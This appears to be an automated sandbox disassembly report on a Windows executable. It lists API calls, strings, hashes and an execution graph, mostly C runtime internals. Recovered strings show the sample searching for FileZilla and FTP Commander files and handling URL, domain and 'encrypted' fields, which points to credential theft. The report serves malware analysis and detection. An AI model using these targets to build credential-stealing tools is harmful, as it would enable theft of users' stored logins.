                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0.3%
                          Signature Coverage:0%
                          Total number of Nodes:1163
                          Total number of Limit Nodes:12
                          execution_graph 3537 4012c0 FindFirstFileA 3540 401080 GetTickCount 3537->3540 3539 4012e8 3552 401655 3540->3552 3542 4010a2 3543 4010b1 GetDesktopWindow GetClassNameA 3542->3543 3544 4010e7 GlobalAlloc 3542->3544 3543->3542 3555 4012f0 3544->3555 3546 401116 3547 40112c GetCurrentProcess GetProcessIoCounters GetCurrentProcess GetProcessTimes 3546->3547 3549 4011ca 3546->3549 3547->3546 3550 4012a5 ExitProcess 3549->3550 3559 401000 3549->3559 3563 401d3d 3552->3563 3556 401308 3555->3556 3557 40132f __VEC_memcpy 3556->3557 3558 401337 3556->3558 3557->3558 3558->3546 3560 40106d 3559->3560 3561 40101a 3559->3561 3560->3549 3562 401020 GetTickCount 3561->3562 3562->3560 3562->3562 3568 401cc6 GetLastError 3563->3568 3565 401d43 3566 40165a 3565->3566 3583 402149 3565->3583 3566->3542 3590 401b98 TlsGetValue 3568->3590 3571 401d31 SetLastError 3571->3565 3572 401ce3 3595 404032 3572->3595 3577 401d10 3610 401c07 3577->3610 3578 401d28 3624 403f64 3578->3624 3581 401d18 GetCurrentThreadId 3581->3571 3582 401d2e 3582->3571 3584 402605 __FF_MSGBANNER 67 API calls 3583->3584 3585 40214e 3584->3585 3586 402465 __FF_MSGBANNER 67 API calls 3585->3586 3587 402157 3586->3587 3588 401b21 _raise 67 API calls 3587->3588 3589 402162 3588->3589 3589->3566 3591 401bc6 3590->3591 3592 401bab 3590->3592 3591->3571 3591->3572 3593 401b21 _raise 65 API calls 3592->3593 3594 401bb6 TlsSetValue 3593->3594 3594->3591 3598 404036 3595->3598 3597 401cef 3597->3571 3600 401b21 TlsGetValue 3597->3600 3598->3597 3599 404056 Sleep 3598->3599 3637 406717 3598->3637 3599->3598 3601 401b34 3600->3601 3602 401b55 GetModuleHandleA 3600->3602 3601->3602 3603 401b3e TlsGetValue 3601->3603 3604 401b66 3602->3604 3605 401b4d 3602->3605 3608 401b49 3603->3608 3897 401a3e 3604->3897 3605->3577 3605->3578 3607 401b6b 3607->3605 3609 401b6f GetProcAddress 3607->3609 3608->3602 3608->3605 3609->3605 3909 402f98 3610->3909 3612 401c13 GetModuleHandleA 3613 401c64 InterlockedIncrement 3612->3613 3614 401c35 3612->3614 3615 4034ee __lock 63 API calls 3613->3615 3616 401a3e _raise 63 API calls 3614->3616 3617 401c8b 3615->3617 3618 401c3a 3616->3618 3910 40365f InterlockedIncrement 3617->3910 3618->3613 3619 401c3e GetProcAddress GetProcAddress 3618->3619 3619->3613 3621 401caa 3922 401cbd 3621->3922 3623 401cb7 _raise 3623->3581 3626 403f70 _raise 3624->3626 3625 403fe9 _raise _realloc 3625->3582 3626->3625 3628 4034ee __lock 65 API calls 3626->3628 3636 403faf 3626->3636 3627 403fc4 HeapFree 3627->3625 3629 403fd6 3627->3629 3633 403f87 ___sbh_find_block 3628->3633 3630 40427c strtoxl 65 API calls 3629->3630 3631 403fdb GetLastError 3630->3631 3631->3625 3632 403fa1 3933 403fba 3632->3933 3633->3632 3926 4050b8 3633->3926 3636->3625 3636->3627 3638 406723 _raise 3637->3638 3639 40673b 3638->3639 3649 40675a _memset 3638->3649 3650 40427c 3639->3650 3643 4067cc RtlAllocateHeap 3643->3649 3646 406750 _raise 3646->3598 3649->3643 3649->3646 3656 4034ee 3649->3656 3663 405861 3649->3663 3669 406813 3649->3669 3672 404832 3649->3672 3651 401cc6 _raise 67 API calls 3650->3651 3652 404281 3651->3652 3653 40421d 3652->3653 3654 401b21 _raise 67 API calls 3653->3654 3655 40422b __invoke_watson 3654->3655 3657 403501 3656->3657 3658 403514 RtlEnterCriticalSection 3656->3658 3675 40342b 3657->3675 3658->3649 3660 403507 3660->3658 3661 402149 __amsg_exit 66 API calls 3660->3661 3662 403513 3661->3662 3662->3658 3665 40588d 3663->3665 3664 405926 3668 40592f 3664->3668 3892 40547c 3664->3892 3665->3664 3665->3668 3885 4053cc 3665->3885 3668->3649 3896 403416 RtlLeaveCriticalSection 3669->3896 3671 40681a 3671->3649 3673 401b21 _raise 67 API calls 3672->3673 3674 40483d 3673->3674 3674->3649 3676 403437 _raise 3675->3676 3677 40345d 3676->3677 3701 402605 3676->3701 3685 40346d _raise 3677->3685 3747 403ff2 3677->3747 3683 40348e 3689 4034ee __lock 67 API calls 3683->3689 3684 40347f 3688 40427c strtoxl 67 API calls 3684->3688 3685->3660 3688->3685 3690 403495 3689->3690 3691 4034c9 3690->3691 3692 40349d 3690->3692 3693 403f64 __mtinitlocknum 67 API calls 3691->3693 3752 404763 3692->3752 3695 4034ba 3693->3695 3765 4034e5 3695->3765 3696 4034a8 3696->3695 3697 403f64 __mtinitlocknum 67 API calls 3696->3697 3699 4034b4 3697->3699 3700 40427c strtoxl 67 API calls 3699->3700 3700->3695 3768 404c30 3701->3768 3703 40260c 3704 402619 3703->3704 3705 404c30 __FF_MSGBANNER 67 API calls 3703->3705 3706 402465 __FF_MSGBANNER 67 API calls 3704->3706 3708 40263b 3704->3708 3705->3704 3707 402631 3706->3707 3709 402465 __FF_MSGBANNER 67 API calls 3707->3709 3710 402465 3708->3710 3709->3708 3711 402471 3710->3711 3712 404c30 __FF_MSGBANNER 64 API calls 3711->3712 3743 4025c7 3711->3743 3713 402491 3712->3713 3714 4025cc GetStdHandle 3713->3714 3715 404c30 __FF_MSGBANNER 64 API calls 3713->3715 3716 4025da _strlen 3714->3716 3714->3743 3717 4024a2 3715->3717 3719 4025f4 WriteFile 3716->3719 3716->3743 3717->3714 3718 4024b4 3717->3718 3718->3743 3775 404bcb 3718->3775 3719->3743 3722 4024ea GetModuleFileNameA 3724 402508 3722->3724 3730 40252b _strlen 3722->3730 3726 404bcb _strcpy_s 64 API calls 3724->3726 3727 402518 3726->3727 3729 404121 __invoke_watson 10 API calls 3727->3729 3727->3730 3728 40256e 3800 404a11 3728->3800 3729->3730 3730->3728 3791 404a82 3730->3791 3734 402592 3737 404a11 _strcat_s 64 API calls 3734->3737 3736 404121 __invoke_watson 10 API calls 3736->3734 3738 4025a3 3737->3738 3740 4025b4 3738->3740 3741 404121 __invoke_watson 10 API calls 3738->3741 3739 404121 __invoke_watson 10 API calls 3739->3728 3809 404854 3740->3809 3741->3740 3744 402193 3743->3744 3846 40216d GetModuleHandleA 3744->3846 3749 403ff6 3747->3749 3750 403478 3749->3750 3751 40400e Sleep 3749->3751 3849 406654 3749->3849 3750->3683 3750->3684 3751->3749 3753 40476f _raise 3752->3753 3754 401b21 _raise 65 API calls 3753->3754 3755 40477f 3754->3755 3764 4047d3 _raise 3755->3764 3867 4021f2 3755->3867 3757 40478f 3758 404121 __invoke_watson 10 API calls 3757->3758 3760 40479e 3757->3760 3758->3760 3759 4047a7 GetModuleHandleA 3761 4047b6 GetProcAddress 3759->3761 3762 4047c8 3759->3762 3760->3759 3760->3762 3761->3762 3874 401aaa TlsGetValue 3762->3874 3764->3696 3884 403416 RtlLeaveCriticalSection 3765->3884 3767 4034ec 3767->3685 3769 404c3b 3768->3769 3770 404c45 3769->3770 3771 40427c strtoxl 67 API calls 3769->3771 3770->3703 3772 404c5e 3771->3772 3773 40421d strtoxl 67 API calls 3772->3773 3774 404c6e 3773->3774 3774->3703 3776 404be0 3775->3776 3777 404bd8 3775->3777 3778 40427c strtoxl 67 API calls 3776->3778 3777->3776 3780 404c07 3777->3780 3783 404be5 3778->3783 3779 40421d strtoxl 67 API calls 3781 4024d6 3779->3781 3780->3781 3782 40427c strtoxl 67 API calls 3780->3782 3781->3722 3784 404121 3781->3784 3782->3783 3783->3779 3785 405f60 _memset 3784->3785 3786 4041b2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3785->3786 3787 4041f5 GetCurrentProcess TerminateProcess 3786->3787 3789 4041e9 __invoke_watson 3786->3789 3788 401662 __invoke_watson 5 API calls 3787->3788 3790 4024e7 3788->3790 3789->3787 3790->3722 3796 404a92 3791->3796 3792 404a96 3793 40427c strtoxl 67 API calls 3792->3793 3794 40255b 3792->3794 3795 404ab2 3793->3795 3794->3728 3794->3739 3797 40421d strtoxl 67 API calls 3795->3797 3796->3792 3796->3794 3798 404adc 3796->3798 3797->3794 3798->3794 3799 40427c strtoxl 67 API calls 3798->3799 3799->3795 3801 404a26 3800->3801 3803 404a1e 3800->3803 3802 40427c strtoxl 67 API calls 3801->3802 3808 404a2b 3802->3808 3803->3801 3805 404a5b 3803->3805 3804 40421d strtoxl 67 API calls 3806 402581 3804->3806 3805->3806 3807 40427c strtoxl 67 API calls 3805->3807 3806->3734 3806->3736 3807->3808 3808->3804 3810 401b18 _raise 61 API calls 3809->3810 3811 404862 3810->3811 3812 40487c LoadLibraryA 3811->3812 3816 404924 3811->3816 3813 404891 GetProcAddress 3812->3813 3826 4049f5 3812->3826 3815 4048a7 3813->3815 3813->3826 3814 4049af 3818 401b21 _raise 61 API calls 3814->3818 3842 404994 3814->3842 3819 401aaa __init_pointers 61 API calls 3815->3819 3816->3814 3820 401b21 _raise 61 API calls 3816->3820 3817 401b21 _raise 61 API calls 3817->3826 3827 4049bf 3818->3827 3821 4048ad GetProcAddress 3819->3821 3822 404944 3820->3822 3823 401aaa __init_pointers 61 API calls 3821->3823 3824 401b21 _raise 61 API calls 3822->3824 3825 4048c2 GetProcAddress 3823->3825 3839 404951 3824->3839 3828 401aaa __init_pointers 61 API calls 3825->3828 3826->3743 3831 401b21 _raise 61 API calls 3827->3831 3827->3842 3829 4048d7 3828->3829 3830 4021f2 ___crtInitCritSecAndSpinCount 61 API calls 3829->3830 3832 4048e5 3830->3832 3831->3842 3833 4048f5 3832->3833 3835 404121 __invoke_watson 10 API calls 3832->3835 3833->3816 3836 4048fe GetProcAddress 3833->3836 3834 40497c 3837 402229 __FF_MSGBANNER 61 API calls 3834->3837 3835->3833 3838 401aaa __init_pointers 61 API calls 3836->3838 3840 404985 3837->3840 3841 40490c 3838->3841 3839->3814 3839->3834 3840->3842 3844 404121 __invoke_watson 10 API calls 3840->3844 3841->3816 3843 404916 GetProcAddress 3841->3843 3842->3817 3845 401aaa __init_pointers 61 API calls 3843->3845 3844->3842 3845->3816 3847 40218c ExitProcess 3846->3847 3848 40217c GetProcAddress 3846->3848 3848->3847 3850 406701 3849->3850 3856 406662 3849->3856 3851 404832 _malloc 66 API calls 3850->3851 3852 406707 3851->3852 3854 40427c strtoxl 66 API calls 3852->3854 3853 402605 __FF_MSGBANNER 66 API calls 3853->3856 3855 40670d 3854->3855 3855->3749 3856->3853 3857 406605 _malloc 66 API calls 3856->3857 3858 402465 __FF_MSGBANNER 66 API calls 3856->3858 3859 4066c5 RtlAllocateHeap 3856->3859 3860 402193 _fast_error_exit GetModuleHandleA GetProcAddress ExitProcess 3856->3860 3861 4066f8 3856->3861 3862 4066ec 3856->3862 3863 404832 _malloc 66 API calls 3856->3863 3865 4066ea 3856->3865 3857->3856 3858->3856 3859->3856 3860->3856 3861->3749 3864 40427c strtoxl 66 API calls 3862->3864 3863->3856 3864->3865 3866 40427c strtoxl 66 API calls 3865->3866 3866->3861 3868 4021fd 3867->3868 3869 40427c strtoxl 67 API calls 3868->3869 3870 402223 3868->3870 3871 402202 3869->3871 3870->3757 3872 40421d strtoxl 67 API calls 3871->3872 3873 402212 3872->3873 3873->3757 3875 401abd 3874->3875 3876 401ade GetModuleHandleA 3874->3876 3875->3876 3879 401ac7 TlsGetValue 3875->3879 3877 401ad6 3876->3877 3878 401aef 3876->3878 3877->3764 3880 401a3e _raise 63 API calls 3878->3880 3882 401ad2 3879->3882 3881 401af4 3880->3881 3881->3877 3883 401af8 GetProcAddress 3881->3883 3882->3876 3882->3877 3883->3877 3884->3767 3886 405413 RtlAllocateHeap 3885->3886 3887 4053df RtlReAllocateHeap 3885->3887 3889 405436 VirtualAlloc 3886->3889 3891 4053fd 3886->3891 3888 405401 3887->3888 3887->3891 3888->3886 3890 405450 HeapFree 3889->3890 3889->3891 3890->3891 3891->3664 3893 405491 VirtualAlloc 3892->3893 3895 4054d8 3893->3895 3895->3668 3896->3671 3902 402229 3897->3902 3899 401a59 3900 401a60 _raise 3899->3900 3901 401a64 GetModuleHandleA 3899->3901 3900->3607 3901->3900 3903 402234 3902->3903 3904 402259 3903->3904 3905 40427c strtoxl 67 API calls 3903->3905 3904->3899 3906 402239 3905->3906 3907 40421d strtoxl 67 API calls 3906->3907 3908 402249 3907->3908 3908->3899 3909->3612 3911 40367a InterlockedIncrement 3910->3911 3912 40367d 3910->3912 3911->3912 3913 403687 InterlockedIncrement 3912->3913 3914 40368a 3912->3914 3913->3914 3915 403694 InterlockedIncrement 3914->3915 3916 403697 3914->3916 3915->3916 3917 4036a1 InterlockedIncrement 3916->3917 3919 4036a4 3916->3919 3917->3919 3918 4036b9 InterlockedIncrement 3918->3919 3919->3918 3920 4036c9 InterlockedIncrement 3919->3920 3921 4036d2 InterlockedIncrement 3919->3921 3920->3919 3921->3621 3925 403416 RtlLeaveCriticalSection 3922->3925 3924 401cc4 3924->3623 3925->3924 3928 4050f5 3926->3928 3932 405397 3926->3932 3927 4052e1 VirtualFree 3929 405345 3927->3929 3928->3927 3928->3932 3930 405354 VirtualFree HeapFree 3929->3930 3929->3932 3931 4012f0 ___sbh_free_block __VEC_memcpy 3930->3931 3931->3932 3932->3632 3936 403416 RtlLeaveCriticalSection 3933->3936 3935 403fc1 3935->3636 3936->3935 4815 403000 4816 403038 4815->4816 4817 40302b 4815->4817 4819 401662 __invoke_watson 5 API calls 4816->4819 4818 401662 __invoke_watson 5 API calls 4817->4818 4818->4816 4822 403048 __except_handler4 4819->4822 4820 4030cf 4821 4030a4 __except_handler4 4821->4820 4823 4030bf 4821->4823 4824 401662 __invoke_watson 5 API calls 4821->4824 4822->4820 4822->4821 4827 4030e5 __except_handler4 4822->4827 4825 401662 __invoke_watson 5 API calls 4823->4825 4824->4823 4825->4820 4833 405c66 RtlUnwind 4827->4833 4828 403124 __except_handler4 4829 40315b 4828->4829 4831 401662 __invoke_watson 5 API calls 4828->4831 